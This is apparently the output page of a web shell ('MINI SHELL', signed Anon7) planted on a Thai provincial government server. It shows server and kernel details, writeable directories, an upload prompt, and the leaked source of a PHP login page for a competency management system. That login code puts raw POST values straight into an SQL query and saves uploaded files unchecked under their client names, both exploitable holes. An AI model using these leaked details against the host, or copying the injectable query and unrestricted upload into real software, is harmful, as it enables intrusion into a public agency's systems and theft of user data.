MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/CA2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/CA2/login.php
<?php
session_start();
require_once "config/config.ini.php";
require_once "common/database.class.php";

$db = new database();
$db->connect();

include("class.openssl.php");
$ossl = new OpenSSL();

$pass="logon";

$ossl->set_privkeypass($pass);
$ossl->generateRandomString(5);
 
?>
<html>
<head>
<title>CMSS : Competency Management Supporting System</title>
<META http-equiv=Content-Type content="text/html; charset=windows-874">


<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
body,td,th{
font-size:12px;}
-->
</style>
<link href="css/style.css" rel="stylesheet" type="text/css">
</head>

<body>


<table width="100%" border="0" cellspacing="0" cellpadding="0" style="border: 1px solid #398BCB">
  <tr>
    <td><? include ("header.php");?></td>
  </tr>
  
  
  <tr>
    <td>
	
	
	<table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="165" align="left" valign="top" bgcolor="#999999"><img src="images/cmss_banner_05.png" width="165" height="91">
<? include ("left_menu.php");?></td>
        <td valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td></td>
              </tr>
              <tr>
                <td >
               <table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td><table width="100%" border="0" cellspacing="0" cellpadding="1">
  <tr>
    <td bgcolor="#9797FF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td bgcolor="#FFFFFF" height="600"  valign="top"> 
<table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td>
	
<style type="text/css">
body,td,th{

font-size:13px;}
</style>

<?php
if(isset($bt_login)){
  extract($_POST);
  $query = $db->query("SELECT * FROM member WHERE username = '$username' AND password = '$password' ");
  $rows = $db->fetch($query);
  $num = $db->numrows($query);
  
  if($num > 0){
	$_SESSION['username'] = $rows['username'];
	$_SESSION['public_file'] = $rows['public_file'];
	$_SESSION['private_file'] = $rows['private_file'];
     echo "<SCRIPT LANGUAGE='JavaScript'> top.location='login.php';</SCRIPT>";
	//include "check_private.php";
  }else{
    echo "<center><b><font color='#cc0000'>ชื่อผู้ใช้หรือรหัสผ่านผิด  <a href='login.php'><u> ลองใหม่อีกครั้ง</u></a></font></b></center>";
  }
  
  
}//end if
if(isset($_POST['bt_check'])){
   if($_FILES['file01']['tmp_name'] != ""){
    
	$dir = FILE_LOCATION2.basename($_FILES['file01']['name']);
    $dir1 = "file://".FILE_LOCATION2.basename($_FILES['file01']['name']);
	$dir2 = "file://".FILE_LOCATION.$_SESSION['public_file'];
	
	
	move_uploaded_file($_FILES['file01']['tmp_name'],$dir);
	
	//$ossl->set_privatekey($dir1);
	$ossl->load_privatekey($dir1);
    $ossl->load_certificate($dir2);

    echo "<br><br><br><center>";
    echo "<h3><u>ผลการตรวจสอบ</u></h3>\n";
    $ok = $ossl->check_privatekey_match_certificate();
	
	if ($ok == 1) {
      echo "Private key เหมือนกับ Certificate";
	  $_SESSION['status'] = 1;
    } elseif ($ok == 0) {
      echo "Private key ไม่เหมือน Certificate <a href = 'login.php' target='iframe_body'>เทียบใหม่อีกครั้ง</a>";
    } else {
      echo "Private key ไม่เหมือน Certificate <a href = 'login.php' target='iframe_body'>เทียบใหม่อีกครั้ง</a>";
    }
	
	echo "</center><br><br><br>";
   }
}//endif

if(empty($_POST['bt_login']) and empty($_POST['bt_check']) and isset($_SESSION['username']) and $_SESSION['status'] != 1){
  include "check_private.php";
}


if(isset($_SESSION['username'])){
 echo "<br><center>ท่านได้ล็อกอินเข้าสู่ระบบ ชื่อผู้ใช้ <font color='#cc0000'><b>".$_SESSION['username']."</b></font> </center><br>";
}
if(empty($_POST['bt_login']) and empty($_POST['bt_check']) and empty($_SESSION['username']) and $_SESSION['status'] != 1){
?>
<br />
<br />
<br />
<br />
<form action="" method="post" name="frm1">

<table width="300" border="1" cellspacing="0" cellpadding="5" align="center" style="border-collapse:collapse;" bordercolor="#CCCCCC">
   <tr>
    <td align="center" bgcolor="#cccccc"><strong>ล็อกอินเข้าสู่ระบบ</strong>
	</td>
  </tr>
  <tr>
    <td>
	<table width="100%" border="0" cellspacing="0" cellpadding="5" align="center">
  <tr>
    <td width="89"><div align="right">ชื่อผู้ใช้</div></td>
    <td width="177"><input name="username" type="text" size="20" /></td>
  </tr>
  <tr>
    <td><div align="right">รหัสผ่าน</div></td>
    <td><input name="password" type="password" size="20" /></td>
  </tr>
    <td>&nbsp;</td>
    <td><input name="bt_login" type="submit" value=" Login " /></td>
  </tr>
</table>
	</td>
  </tr>
</table>

</form>
<?php
}//endif

?>	
	
	
	
	
	
	
	</td>
  </tr>
</table>
	
	</td>
  </tr>
</table>
</td>
  </tr>
</table></td>
  </tr>
</table>


               </td>
              </tr>
            </table></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><span style="border-right:1 solid #909090">
      <? include ("footer.php");?>
    </span></td>
  </tr>
</table>
</body>
</html>

Anon7 - 2021